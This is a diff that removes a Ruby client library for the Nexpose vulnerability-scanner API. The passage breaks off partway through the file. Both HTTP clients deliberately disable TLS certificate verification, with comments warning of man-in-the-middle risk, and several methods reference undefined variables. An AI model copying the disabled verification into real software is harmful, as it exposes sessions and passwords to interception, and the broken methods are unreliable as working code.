--- a/lib/rapid7/nexpose.rb
+++ /dev/null
@@ -1,2618 +0,0 @@
-#
-# The Nexpose API
-#
-=begin
-
-Copyright (C) 2009-2012, Rapid7, Inc.
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without modification,
-are permitted provided that the following conditions are met:
-
-    * Redistributions of source code must retain the above copyright notice,
-    this list of conditions and the following disclaimer.
-
-    * Redistributions in binary form must reproduce the above copyright notice,
-    this list of conditions and the following disclaimer in the documentation
-    and/or other materials provided with the distribution.
-
-    * Neither the name of Rapid7, Inc. nor the names of its contributors
-    may be used to endorse or promote products derived from this software
-    without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
-ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
-(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
-ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
-SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-=end
-
-#
-# WARNING! This code makes an SSL connection to the Nexpose server, but does NOT
-#          verify the certificate at this time. This can be a security issue if
-#          an attacker is able to man-in-the-middle the connection between the
-#          Metasploit console and the Nexpose server. In the common case of
-#          running Nexpose and Metasploit on the same host, this is a low risk.
-#
-
-#
-# WARNING! This code is still rough and going through substantive changes. While
-#          you can build tools using this library today, keep in mind that method
-#          names and parameters may change in the future.
-#
-
-require 'date'
-require 'rexml/document'
-require 'net/https'
-require 'net/http'
-require 'uri'
-require 'rex/mime'
-
-
-module Nexpose
-
-module Sanitize
-  def replace_entities(str)
-    ret = str.dup
-    ret.gsub!(/&/, "&amp;")
-    ret.gsub!(/'/, "&apos;")
-    ret.gsub!(/"/, "&quot;")
-    ret.gsub!(/</, "&lt;")
-    ret.gsub!(/>/, "&gt;")
-    ret
-  end
-end
-
-class APIError < ::RuntimeError
-  attr_accessor :req, :reason
-  def initialize(req, reason = '')
-    self.req = req
-    self.reason = reason
-  end
-  def to_s
-    "NexposeAPI: #{self.reason}"
-  end
-end
-
-class AuthenticationFailed < APIError
-  def initialize(req)
-    self.req = req
-    self.reason = "Login Failed"
-  end
-end
-
-module XMLUtils
-  def parse_xml(xml)
-    ::REXML::Document.new(xml.to_s)
-  end
-end
-
-class APIRequest
-  include XMLUtils
-
-  attr_reader :http
-  attr_reader :uri
-  attr_reader :headers
-  attr_reader :retry_count
-  attr_reader :time_out
-  attr_reader :pause
-
-  attr_reader :req
-  attr_reader :res
-  attr_reader :sid
-  attr_reader :success
-
-  attr_reader :error
-  attr_reader :trace
-
-  attr_reader :raw_response
-  attr_reader :raw_response_data
-
-  def initialize(req, url)
-    @url = url
-    @req = req
-    prepare_http_client
-  end
-
-  def prepare_http_client
-    @retry_count = 0
-    @retry_count_max = 10
-    @time_out = 30
-    @pause = 2
-    @uri = URI.parse(@url)
-    @http = ::Net::HTTP.new(@uri.host, @uri.port)
-    @http.use_ssl = true
-    #
-    # XXX: This is obviously a security issue, however, we handle this at the client level by forcing
-    #      a confirmation when the nexpose host is not localhost. In a perfect world, we would present
-    #      the server signature before accepting it, but this requires either a direct callback inside
-    #      of this module back to whatever UI, or opens a race condition between accept and attempt.
-    #
-    @http.verify_mode = OpenSSL::SSL::VERIFY_NONE
-    @headers = {'Content-Type' => 'text/xml'}
-    @success = false
-  end
-
-  def execute
-    @conn_tries = 0
-
-    begin
-    prepare_http_client
-
-    @raw_response = @http.post(@uri.path, @req, @headers)
-    @raw_response_data = @raw_response.body
-    @res = parse_xml(@raw_response_data)
-
-    if(not @res.root)
-      @error = "Nexpose service returned invalid XML"
-      return @sid
-    end
-
-    @sid = attributes['session-id']
-
-    @success = true
-
-    if(attributes['success'] and attributes['success'].to_i == 0)
-      @success = false
-    end
-
-    # Look for a stack trace
-    @res.elements.each('//Failure/Exception') do |s|
-
-      # 1.1 returns lower case elements
-      s.elements.each('message') do |m|
-        @error = m.text
-      end
-      s.elements.each('stacktrace') do |m|
-        @trace = m.text
-      end
-
-      # 1.2 returns capitalized elements
-      s.elements.each('Message') do |m|
-        @error = m.text
-      end
-      s.elements.each('Stacktrace') do |m|
-        @trace = m.text
-      end
-    end
-
-    @res.elements.each('//Failure') do |s|
-
-      # 1.1 returns lower case elements
-      s.elements.each('message') do |m|
-        @error = m.text
-      end
-      s.elements.each('stacktrace') do |m|
-        @trace = m.text
-      end
-
-      # 1.2 returns capitalized elements
-      s.elements.each('Message') do |m|
-        @error = m.text
-      end
-      s.elements.each('Stacktrace') do |m|
-        @trace = m.text
-      end
-    end
-
-    # This is a hack to handle corner cases where a heavily loaded Nexpose instance
-    # drops our HTTP connection before processing. We try 5 times to establish a
-    # connection in these situations. The actual exception occurs in the Ruby
-    # http library, which is why we use such generic error classes.
-    rescue ::ArgumentError, ::NoMethodError
-      if @conn_tries < 5
-        @conn_tries += 1
-        retry
-      end
-    rescue ::Timeout::Error
-      if @conn_tries < 5
-        @conn_tries += 1
-        retry
-      end
-      @error = "Nexpose host did not respond"
-    rescue ::SocketError, ::Errno::EHOSTUNREACH,::Errno::ENETDOWN,::Errno::ENETUNREACH,::Errno::ENETRESET,::Errno::EHOSTDOWN,::Errno::EACCES,::Errno::EINVAL,::Errno::EADDRNOTAVAIL
-      @error = "Nexpose host is unreachable"
-    # Handle console-level interrupts
-    rescue ::Interrupt
-      @error = "Received a user interrupt"
-    rescue ::Errno::ECONNRESET,::Errno::ECONNREFUSED,::Errno::ENOTCONN,::Errno::ECONNABORTED, ::OpenSSL::SSL::SSLError
-      @error = "Nexpose service is not available"
-    rescue ::REXML::ParseException
-      @error = "Nexpose has not been properly licensed"
-    end
-
-    @success = false if @error
-
-    @sid
-  end
-
-  def attributes(*args)
-    return if not @res.root
-    @res.root.attributes(*args)
-  end
-
-  def self.execute(url,req)
-    obj = self.new(req,url)
-    obj.execute
-    if(not obj.success)
-      raise APIError.new(obj, "Action failed: #{obj.error}")
-    end
-    obj
-  end
-
-end
-
-module NexposeAPI
-
-  def make_xml(name, opts={}, data='')
-    xml = REXML::Element.new(name)
-    if(@session_id)
-      xml.attributes['session-id'] = @session_id
-    end
-
-    opts.keys.each do |k|
-      xml.attributes[k] = "#{opts[k]}"
-    end
-
-    xml.text = data
-
-    xml
-  end
-
-  def make_xml_plain(name, opts={}, data='')
-    xml = REXML::Element.new(name)
-
-    opts.keys.each do |k|
-      xml.attributes[k] = "#{opts[k]}"
-    end
-
-    xml.text = data
-
-    xml
-  end
-  def scan_stop(param)
-    r = execute(make_xml('ScanStopRequest', { 'scan-id' => param }))
-    r.success
-  end
-
-  def scan_status(param)
-    r = execute(make_xml('ScanStatusRequest', { 'scan-id' => param }))
-    r.success ? r.attributes['status'] : nil
-  end
-
-  def scan_activity
-    r = execute(make_xml('ScanActivityRequest', { }))
-    if(r.success)
-      res = []
-      r.res.elements.each("//ScanSummary") do |scan|
-        res << {
-          :scan_id    => scan.attributes['scan-id'].to_i,
-          :site_id    => scan.attributes['site-id'].to_i,
-          :engine_id  => scan.attributes['engine-id'].to_i,
-          :status     => scan.attributes['status'].to_s,
-          :start_time => Date.parse(scan.attributes['startTime'].to_s).to_time
-        }
-      end
-      return res
-    else
-      return false
-    end
-  end
-
-  def scan_statistics(param)
-    r = execute(make_xml('ScanStatisticsRequest', {'scan-id' => param }))
-    if(r.success)
-      res = {}
-      r.res.elements.each("//ScanSummary/nodes") do |node|
-        res[:nodes] = {}
-        node.attributes.keys.each do |k|
-          res[:nodes][k] = node.attributes[k].to_i
-        end
-      end
-      r.res.elements.each("//ScanSummary/tasks") do |task|
-        res[:task] = {}
-        task.attributes.keys.each do |k|
-          res[:task][k] = task.attributes[k].to_i
-        end
-      end
-      r.res.elements.each("//ScanSummary/vulnerabilities") do |vuln|
-        res[:vulns] ||= {}
-        k = vuln.attributes['status'] + (vuln.attributes['severity'] ? ("-" + vuln.attributes['severity']) : '')
-        res[:vulns][k] = vuln.attributes['count'].to_i
-      end
-      r.res.elements.each("//ScanSummary") do |summ|
-        res[:summary] = {}
-        summ.attributes.keys.each do |k|
-          res[:summary][k] = summ.attributes[k]
-          if (res[:summary][k] =~ /^\d+$/)
-            res[:summary][k] = res[:summary][k].to_i
-          end
-        end
-      end
-      r.res.elements.each("//ScanSummary/message") do |message|
-        res[:message] = message.text
-      end
-      return res
-    else
-      return false
-    end
-  end
-
-  def report_generate(param)
-    r = execute(make_xml('ReportGenerateRequest', { 'report-id' => param }))
-    r.success
-  end
-
-  def report_last(param)
-    r = execute(make_xml('ReportHistoryRequest', { 'reportcfg-id' => param }))
-    res = nil
-    if(r.success)
-      stk = []
-      r.res.elements.each("//ReportSummary") do |rep|
-        stk << [ rep.attributes['id'].to_i, rep.attributes['report-URI'] ]
-      end
-      if (stk.length > 0)
-        stk.sort!{|a,b| b[0] <=> a[0]}
-        res = stk[0][1]
-      end
-    end
-    res
-  end
-
-  def report_last_detail(param)
-    r = execute(make_xml('ReportHistoryRequest', { 'reportcfg-id' => param }))
-    res = nil
-    if(r.success)
-      stk = {}
-      r.res.elements.each("//ReportSummary") do |rep|
-        stk[ rep.attributes['id'].to_i ] = {
-          'id'     => rep.attributes['id'].to_i,
-          'url'    => rep.attributes['report-URI'],
-          'status' => rep.attributes['status'],
-          'date'   => rep.attributes['generated-on']
-        }
-      end
-      if (stk.keys.length > 0)
-        res = stk[ stk.keys.sort{|a,b| b[0] <=> a[0]}.first ]
-      end
-    end
-    res
-  end
-
-  def report_history(param)
-    execute(make_xml('ReportHistoryRequest', { 'reportcfg-id' => param }))
-  end
-
-  def report_config_delete(param)
-    r = execute(make_xml('ReportDeleteRequest', { 'reportcfg-id' => param }))
-    r.success
-  end
-
-  def report_delete(param)
-    r = execute(make_xml('ReportDeleteRequest', { 'report-id' => param }))
-    r.success
-  end
-
-  def device_delete(param)
-    r = execute(make_xml('DeviceDeleteRequest', { 'device-id' => param }))
-    r.success
-  end
-
-  def vuln_exception_create(vuln_id, reason, scope, comment='', attrs={})
-    attrs = attrs.merge({ 'vuln-id' => vuln_id, 'reason' => reason, 'scope' => scope })
-    req = make_xml('VulnerabilityExceptionCreateRequest', attrs)
- 		com = make_xml_plain('comment', {}, comment.to_s)
-    req << com
-    r = execute(req, '1.2')
-  end
-
-  def vuln_exception_approve(exception_id, comment='', attrs={})
-    attrs = attrs.merge({ 'exception-id' => exception_id })
-    req = make_xml('VulnerabilityExceptionApproveRequest', attrs)
- 		com = make_xml_plain('comment', {}, comment.to_s)
-    req << com
-    r = execute(req, '1.2')
-  end
-
-  def vuln_exception_update_expiration(exception_id, expiration_date, attrs={})
-    attrs = attrs.merge({ 'exception-id' => exception_id, 'expiration-date' => expiration_date })
-    req = make_xml('VulnerabilityExceptionUpdateExpirationDateRequest', attrs)
-    r = execute(req, '1.2')
-  end
-
-  def asset_group_delete(connection, id, debug = false)
-    r = execute(make_xml('AssetGroupDeleteRequest', { 'group-id' => param }))
-    r.success
-  end
-
-  def asset_group_create(name, description, devices)
-    req = make_xml('AssetGroupSaveRequest')
-    req_ag = make_xml_plain('AssetGroup', { 'id' => "-1", 'name' => name, 'description' => description })
- 		req_devices = make_xml_plain('Devices')
-    devices.each do |did|
-      req_devices << make_xml_plain('device', { 'id' => did })
-    end
-    req_ag << req_devices
-    req    << req_ag
-    r = execute(req)
-  end
-
-  #-------------------------------------------------------------------------
-  # Returns all asset group information
-  #-------------------------------------------------------------------------
-  def asset_groups_listing()
-    r = execute(make_xml('AssetGroupListingRequest'))
-
-    if r.success
-      res = []
-      r.res.elements.each('//AssetGroupSummary') do |group|
-        res << {
-            :asset_group_id => group.attributes['id'].to_i,
-            :name => group.attributes['name'].to_s,
-            :description => group.attributes['description'].to_s,
-            :risk_score => group.attributes['riskscore'].to_f,
-        }
-      end
-      res
-    else
-      false
-    end
-  end
-
-  #-------------------------------------------------------------------------
-  # Returns an asset group configuration information for a specific group ID
-  #-------------------------------------------------------------------------
-  def asset_group_config(group_id)
-    r = execute(make_xml('AssetGroupConfigRequest', {'group-id' => group_id}))
-
-    if r.success
-      res = []
-      r.res.elements.each('//Devices/device') do |device_info|
-        res << {
-            :device_id => device_info.attributes['id'].to_i,
-            :site_id => device_info.attributes['site-id'].to_i,
-            :address => device_info.attributes['address'].to_s,
-            :riskfactor => device_info.attributes['riskfactor'].to_f,
-        }
-      end
-      res
-    else
-      false
-    end
-  end
-
-  #-----------------------------------------------------------------------
-  # Starts device specific site scanning.
-  #
-  # devices - An Array of device IDs
-  # hosts - An Array of Hashes [o]=>{:range=>"to,from"} [1]=>{:host=>host}
-  #-----------------------------------------------------------------------
-  def site_device_scan_start(site_id, devices, hosts)
-
-    if hosts == nil and devices == nil
-      raise ArgumentError.new("Both the device and host list is nil")
-    end
-
-    xml = make_xml('SiteDevicesScanRequest', {'site-id' => site_id})
-
-    if devices != nil
-      inner_xml = REXML::Element.new 'Devices'
-      for device_id in devices
-        inner_xml.add_element 'device', {'id' => "#{device_id}"}
-      end
-      xml.add_element inner_xml
-    end
-
-    if hosts != nil
-      inner_xml = REXML::Element.new 'Hosts'
-      hosts.each_index do |x|
-        if hosts[x].key? :range
-          to = hosts[x][:range].split(',')[0]
-          from = hosts[x][:range].split(',')[1]
-          inner_xml.add_element 'range', {'to' => "#{to}", 'from' => "#{from}"}
-        end
-        if hosts[x].key? :host
-          host_element = REXML::Element.new 'host'
-          host_element.text = "#{hosts[x][:host]}"
-          inner_xml.add_element host_element
-        end
-      end
-      xml.add_element inner_xml
-    end
-
-    r = execute xml
-    if r.success
-      r.res.elements.each('//Scan') do |scan_info|
-        return {
-            :scan_id => scan_info.attributes['scan-id'].to_i,
-            :engine_id => scan_info.attributes['engine-id'].to_i
-        }
-      end
-    else
-      false
-    end
-  end
-
-  def site_delete(param)
-    r = execute(make_xml('SiteDeleteRequest', { 'site-id' => param }))
-    r.success
-  end
-
-  def site_listing
-    r = execute(make_xml('SiteListingRequest', { }))
-
-    if(r.success)
-      res = []
-      r.res.elements.each("//SiteSummary") do |site|
-        res << {
-          :site_id       => site.attributes['id'].to_i,
-          :name          => site.attributes['name'].to_s,
-          :risk_factor   => site.attributes['riskfactor'].to_f,
-          :risk_score    => site.attributes['riskscore'].to_f,
-        }
-      end
-      return res
-    else
-      return false
-    end
-  end
-
-  #-----------------------------------------------------------------------
-  # TODO: Needs to be expanded to included details
-  #-----------------------------------------------------------------------
-  def site_scan_history(site_id)
-    r = execute(make_xml('SiteScanHistoryRequest', {'site-id' => site_id.to_s}))
-
-    if (r.success)
-      res = []
-      r.res.elements.each("//ScanSummary") do |site_scan_history|
-        res << {
-            :site_id => site_scan_history.attributes['site-id'].to_i,
-            :scan_id => site_scan_history.attributes['scan-id'].to_i,
-            :engine_id => site_scan_history.attributes['engine-id'].to_i,
-            :start_time => site_scan_history.attributes['startTime'].to_s,
-            :end_time => site_scan_history.attributes['endTime'].to_s
-        }
-      end
-      return res
-    else
-      false
-    end
-  end
-
-  def site_device_listing(site_id)
-    r = execute(make_xml('SiteDeviceListingRequest', { 'site-id' => site_id.to_s }))
-
-    if(r.success)
-      res = []
-      r.res.elements.each("//device") do |device|
-        res << {
-          :device_id     => device.attributes['id'].to_i,
-          :address       => device.attributes['address'].to_s,
-          :risk_factor   => device.attributes['riskfactor'].to_f,
-          :risk_score    => device.attributes['riskscore'].to_f,
-        }
-      end
-      return res
-    else
-      return false
-    end
-  end
-
-  def report_template_listing
-    r = execute(make_xml('ReportTemplateListingRequest', { }))
-
-    if(r.success)
-      res = []
-      r.res.elements.each("//ReportTemplateSummary") do |template|
-        desc = ''
-        template.elements.each("//description") do |ent|
-          desc = ent.text
-        end
-
-        res << {
-          :template_id   => template.attributes['id'].to_s,
-          :name          => template.attributes['name'].to_s,
-          :description   => desc.to_s
-        }
-      end
-      return res
-    else
-      return false
-    end
-  end
-
-
-  def console_command(cmd_string)
-    xml = make_xml('ConsoleCommandRequest', {  })
-    cmd = REXML::Element.new('Command')
-    cmd.text = cmd_string
-    xml << cmd
-
-    r = execute(xml)
-
-    if(r.success)
-      res = ""
-      r.res.elements.each("//Output") do |out|
-        res << out.text.to_s
-      end
-
-      return res
-    else
-      return false
-    end
-  end
-
-  def system_information
-    r = execute(make_xml('SystemInformationRequest', { }))
-
-    if(r.success)
-      res = {}
-      r.res.elements.each("//Statistic") do |stat|
-        res[ stat.attributes['name'].to_s ] = stat.text.to_s
-      end
-
-      return res
-    else
-      return false
-    end
-  end
-
-end
-
-# === Description
-# Object that represents a connection to a Nexpose Security Console.
-#
-# === Examples
-#   # Create a new Nexpose Connection on the default port
-#   nsc = Connection.new("10.1.40.10","nxadmin","password")
-#
-#   # Login to NSC and Establish a Session ID
-#   nsc.login()
-#
-#   # Check Session ID
-#   if (nsc.session_id)
-#       puts "Login Successful"
-#   else
-#       puts "Login Failure"
-#   end
-#
-#   # //Logout
-#   logout_success = nsc.logout()
-#   if (! logout_success)
-#       puts "Logout Failure" + "<p>" + nsc.error_msg.to_s
-#   end
-#
-class Connection
-  include XMLUtils
-  include NexposeAPI
-
-  # true if an error condition exists; false otherwise
-  attr_reader :error
-  # Error message string
-  attr_reader :error_msg
-  # The last XML request sent by this object
-  attr_reader :request_xml
-  # The last XML response received by this object
-  attr_reader :response_xml
-  # Session ID of this connection
-  attr_reader :session_id
-  # The hostname or IP Address of the NSC
-  attr_reader :host
-  # The port of the NSC (default is 3780)
-  attr_reader :port
-  # The username used to login to the NSC
-  attr_reader :username
-  # The password used to login to the NSC
-  attr_reader :password
-  # The URL for communication
-  attr_reader :url
-
-  # Constructor for Connection
-  def initialize(ip, user, pass, port = 3780)
-    @host = ip
-    @port = port
-    @username = user
-    @password = pass
-    @session_id = nil
-    @error = false
-    @url = "https://#{@host}:#{@port}/api/1.1/xml"
-    @url_base = "https://#{@host}:#{@port}/api/"
-  end
-
-  # Establish a new connection and Session ID
-  def login
-
-    # This throws an APIError exception if necessary
-    r = execute(make_xml('LoginRequest', { 'sync-id' => 0, 'password' => @password, 'user-id' => @username }))
-    if(r.success)
-      @session_id = r.sid
-      return true
-    end
-
-    false
-  end
-
-  # Logout of the current connection
-  def logout
-    # Bypass logout unless we have an actual session ID
-    return true unless @session_id
-
-    r = execute(make_xml('LogoutRequest', {'sync-id' => 0}))
-    if(r.success)
-      return true
-    end
-    raise APIError.new(r, 'Logout failed')
-  end
-
-  # Execute an API request
-  def execute(xml, version='1.1')
-    APIRequest.execute("#{@url_base}#{version}/xml", xml.to_s)
-  end
-
-  # Download a specific URL
-  def download(url)
-    uri = URI.parse(url)
-    http = Net::HTTP.new(@host, @port)
-    http.use_ssl = true
-    http.verify_mode = OpenSSL::SSL::VERIFY_NONE            # XXX: security issue
-    headers = {'Cookie' => "nexposeCCSessionID=#{@session_id}"}
-    resp = http.get(uri.path, headers)
-
-    resp ? resp.body : nil
-  end
-end
-
-# === Description
-# Object that represents a listing of all of the sites available on an NSC.
-#
-# === Example
-#   # Create a new Nexpose Connection on the default port and Login
-#   nsc = Connection.new("10.1.40.10","nxadmin","password")
-#   nsc->login();
-#
-#   # Get Site Listing
-#   sitelisting = SiteListing.new(nsc)
-#
-#   # Enumerate through all of the SiteSummaries
-#   sitelisting.sites.each do |sitesummary|
-#       # Do some operation on each site
-#   end
-#
-class SiteListing
-  # true if an error condition exists; false otherwise
-  attr_reader :error
-  # Error message string
-  attr_reader :error_msg
-  # The last XML request sent by this object
-  attr_reader :request_xml
-  # The last XML response received by this object
-  attr_reader :response_xml
-  # The NSC Connection associated with this object
-  attr_reader :connection
-  # Array containing SiteSummary objects for each site in the connection
-  attr_reader :sites
-  # The number of sites
-  attr_reader :site_count
-
-  # Constructor
-  # SiteListing (connection)
-  def initialize(connection)
-    @sites = []
-
-    @connection = connection
-
-    r = @connection.execute('<SiteListingRequest session-id="' + @connection.session_id.to_s + '"/>')
-
-    if (r.success)
-      parse(r.res)
-    else
-      raise APIError.new(r, "Failed to get site listing")
-    end
-  end
-
-  def parse(r)
-    r.elements.each('SiteListingResponse/SiteSummary') do |s|
-      site_summary = SiteSummary.new(
-        s.attributes['id'].to_s,
-        s.attributes['name'].to_s,
-        s.attributes['description'].to_s,
-        s.attributes['riskfactor'].to_s
-      )
-      @sites.push(site_summary)
-    end
-    @site_count = @sites.length
-  end
-end
-
-# === Description
-# Object that represents the summary of a Nexpose Site.
-#
-class SiteSummary
-  # The Site ID
-  attr_reader :id
-  # The Site Name
-  attr_reader :site_name
-  # A Description of the Site
-  attr_reader :description
-  # User assigned risk multiplier
-  attr_reader :riskfactor
-
-  # Constructor
-  # SiteSummary(id, site_name, description, riskfactor = 1)
-  def initialize(id, site_name, description, riskfactor = 1)
-    @id = id
-    @site_name = site_name
-    @description = description
-    @riskfactor = riskfactor
-  end
-
-  def _set_id(id)
-    @id = id
-  end
-end
-
-# === Description
-# Object that represents a single IP address or an inclusive range of IP addresses. If to is nil then the from field will be used to specify a single IP Address only.
-#
-class IPRange
-  # Start of Range *Required
-  attr_reader :from;
-  # End of Range *Optional (If Null then IPRange is a single IP Address)
-  attr_reader :to;
-
-  def initialize(from, to = nil)
-    @from = from
-    @to = to
-  end
-
-  include Sanitize
-  def to_xml
-    if (to and not to.empty?)
-      return %Q{<range from="#{from}" to="#{to}"/>}
-    else
-      return %Q{<range from="#{from}"/>}
-    end
-  end
-end
-
-# === Description
-# Object that represents a hostname to be added to a site.
-class HostName
-
-  # The hostname
-  attr_reader :hostname
-
-  def initialize(hostname)
-    @hostname = hostname
-  end
-
-  include Sanitize
-  def to_xml
-    "<host>#{replace_entities(hostname)}</host>"
-  end
-end
-
-# === Description
-# Object that represents the configuration of a Site. This object is automatically created when a new Site object is instantiated.
-#
-class SiteConfig
-  # true if an error condition exists; false otherwise
-  attr_reader :error
-  # Error message string
-  attr_reader :error_msg
-  # The last XML request sent by this object
-  attr_reader :request_xml
-  # The last XML response received by this object
-  attr_reader :response_xml
-  # The NSC Connection associated with this object
-  attr_reader :connection
-  # The Site ID
-  attr_reader :site_id
-  # The Site Name
-  attr_reader :site_name
-  # A Description of the Site
-  attr_reader :description
-  # User assigned risk multiplier
-  attr_reader :riskfactor
-  # Array containing ((IPRange|HostName)*)
-  attr_reader :hosts
-  # Array containing (AdminCredentials*)
-  attr_reader :credentials
-  # Array containing ((SmtpAlera|SnmpAlert|SyslogAlert)*)
-  attr_reader :alerts
-  # ScanConfig object which holds Schedule and ScanTrigger Objects
-  attr_reader :scanConfig
-
-  def initialize()
-    @xml_tag_stack = Array.new()
-    @hosts = Array.new()
-    @credentials = Array.new()
-    @alerts = Array.new()
-    @error = false
-  end
-
-  # Adds a new host to the hosts array
-  def addHost(host)
-    @hosts.push(host)
-  end
-
-  # Adds a new alert to the alerts array
-  def addAlert(alert)
-    @alerts.push(alert)
-  end
-
-  # Adds a new set of credentials to the credentials array
-  def addCredentials(credential)
-    @credentials.push(credential)
-  end
-
-  # TODO
-  def getSiteConfig(connection,site_id)
-    @connection = connection
-    @site_id = site_id
-
-    r = APIRequest.execute(@connection.url,'<SiteConfigRequest session-id="' + @connection.session_id + '" site-id="' + @site_id + '"/>')
-    parse(r.res)
-  end
-
-  def _set_site_id(site_id)
-    @site_id = site_id
-  end
-
-  def _set_site_name(site_name)
-    @site_name = site_name
-  end
-
-  def _set_description(description)
-    @description = description
-  end
-
-  def _set_riskfactor(riskfactor)
-    @riskfactor = riskfactor
-  end
-
-  def _set_scanConfig(scanConfig)
-    @scanConfig = scanConfig
-  end
-
-  def _set_connection(connection)
-    @connection = connection
-  end
-=begin
-<SiteConfigResponse success='1'>
-<Site name='Site1' id='243' description='' riskfactor='1.0'>
-<Hosts>
-<range from='127.0.0.1'/>
-</Hosts>
-<Credentials>
-</Credentials>
-<Alerting>
-</Alerting>
-<ScanConfig configID='243' name='Full audit' configVersion='3' engineID='2' templateID='full-audit'>
-<Schedules>
-</Schedules>
-<ScanTriggers>
-</ScanTriggers>
-</ScanConfig>
-</Site>
-
-=end
-
-  def parse(response)
-    response.elements.each('SiteConfigResponse/Site') do |s|
-      @site_id = s.attributes['id']
-      @site_name = s.attributes['name']
-      @description = s.attributes['description']
-      @riskfactor = s.attributes['riskfactor']
-      s.elements.each('Hosts/range') do |r|
-        @hosts.push(IPRange.new(r.attributes['from'],r.attributes['to']))
-      end
-      s.elements.each('ScanConfig') do |c|
-        @scanConfig = ScanConfig.new(c.attributes['configID'],
-                      c.attributes['name'],
-                      c.attributes['configVersion'],
-                      c.attributes['templateID'])
-        s.elements.each('Schedule') do |schedule|
-          schedule = new Schedule(schedule.attributes["type"], schedule.attributes["interval"], schedule.attributes["start"], schedule.attributes["enabled"])
-          @scanConfig.addSchedule(schedule)
-        end
-      end
-
-      s.elements.each('Alerting/Alert') do |a|
-
-        a.elements.each('smtpAlert') do |smtp|
-          smtp_alert = SmtpAlert.new(a.attributes["name"], smtp.attributes["sender"], smtp.attributes["limitText"], a.attributes["enabled"])
-
-          smtp.elements.each('recipient') do |recipient|
-            smtp_alert.addRecipient(recipient.text)
-          end
-          @alerts.push(smtp_alert)
-        end
-
-        a.elements.each('snmpAlert') do |snmp|
-          snmp_alert = SnmpAlert.new(a.attributes["name"], snmp.attributes["community"], snmp.attributes["server"], a.attributes["enabled"])
-          @alerts.push(snmp_alert)
-        end
-        a.elements.each('syslogAlert') do |syslog|
-          syslog_alert = SyslogAlert.new(a.attributes["name"], syslog.attributes["server"], a.attributes["enabled"])
-          @alerts.push(syslog_alert)
-        end
-
-        a.elements.each('vulnFilter') do |vulnFilter|
-
-          #vulnfilter = new VulnFilter.new(a.attributes["typemask"], a.attributes["severityThreshold"], $attrs["MAXALERTS"])
-          # Pop off the top alert on the stack
-          #$alert = @alerts.pop()
-          # Add the new recipient string to the Alert Object
-          #$alert.setVulnFilter($vulnfilter)
-          # Push the alert back on to the alert stack
-          #array_push($this->alerts, $alert)
-        end
-
-        a.elements.each('scanFilter') do |scanFilter|
-          #<scanFilter scanStop='0' scanFailed='0' scanStart='1'/>
-          #scanfilter = ScanFilter.new(scanFilter.attributes['scanStop'],scanFilter.attributes['scanFailed'],scanFilter.attributes['scanStart'])
-          #alert = @alerts.pop()
-          #alert.setScanFilter(scanfilter)
-          #@alerts.push(alert)
-        end
-      end
-    end
-  end
-end
-
-# === Description
-# Object that represents the scan history of a site.
-#
-class SiteScanHistory
-  # true if an error condition exists; false otherwise
-  attr_reader :error
-  # Error message string
-  attr_reader :error_msg
-  # The last XML request sent by this object
-  attr_reader :request_xml
-  # The last XML response received by this object
-  attr_reader :response_xml
-  # The NSC Connection associated with this object
-  attr_reader :connection
-  # The Site ID
-  attr_reader :site_id
-  # //Array containing (ScanSummary*)
-  attr_reader :scan_summaries
-
-  def initialize(connection, id)
-    @site_id = id
-    @error = false
-    @connection = connection
-    @scan_summaries = Array.new()
-
-    r = @connection.execute('<SiteScanHistoryRequest' + ' session-id="' + @connection.session_id + '" site-id="' + @site_id + '"/>')
-    status = r.success
-  end
-end
-
-# === Description
-# Object that represents a listing of devices for a site or the entire NSC. Note that only devices which are accessible to the account used to create the connection object will be returned. This object is created and populated automatically with the instantiation of a new Site object.
-#
-class SiteDeviceListing
-
-  # true if an error condition exists; false otherwise
-  attr_reader :error
-  # Error message string
-  attr_reader :error_msg
-  # The last XML request sent by this object
-  attr_reader :request_xml
-  # The last XML response received by this object
-  attr_reader :response_xml
-  # The NSC Connection associated with this object
-  attr_reader :connection
-  # The Site ID. 0 if all sites are specified.
-  attr_reader :site_id
-  # //Array of (Device)*
-  attr_reader :devices
-
-  def initialize(connection, site_id = 0)
-
-    @site_id = site_id
-    @error = false
-    @connection = connection
-    @devices = Array.new()
-
-    r = nil
-    if (@site_id)
-      r = @connection.execute('<SiteDeviceListingRequest session-id="' + connection.session_id + '" site-id="' + @site_id + '"/>')
-    else
-      r = @connection.execute('<SiteDeviceListingRequest session-id="' + connection.session_id + '"/>')
-    end
-
-    if(r.success)
-      response.elements.each('SiteDeviceListingResponse/SiteDevices/device') do |d|
-        @devices.push(Device.new(d.attributes['id'],@site_id,d.attributes["address"],d.attributes["riskfactor"],d.attributes['riskscore']))
-      end
-    end
-  end
-end
-
-# === Description
-# Object that represents a site, including the site configuration, scan history, and device listing.
-#
-# === Example
-#   # Create a new Nexpose Connection on the default port and Login
-#   nsc = Connection.new("10.1.40.10","nxadmin","password")
-#   nsc.login()
-#
-#   # Get an Existing Site
-#   site_existing = Site.new(nsc,184)
-#
-#   # Create a New Site, add some hosts, and save it to the NSC
-#   site = Site.new(nsc)
-#   site.setSiteConfig("New Site", "New Site Created in the API")
-#
-#   # Add the hosts
-#   site.site_config.addHost(HostName.new("localhost"))
-#   site.site_config.addHost(IPRange.new("192.168.7.1","192.168.7.255"))
-#   site.site_config.addHost(IPRange.new("10.1.20.30"))
-#
-#   status = site.saveSite()
-#
-class Site
-  # true if an error condition exists; false otherwise
-  attr_reader :error
-  # Error message string
-  attr_reader :error_msg
-  # The last XML request sent by this object
-  attr_reader :request_xml
-  # The last XML response received by this object
-  attr_reader :response_xml
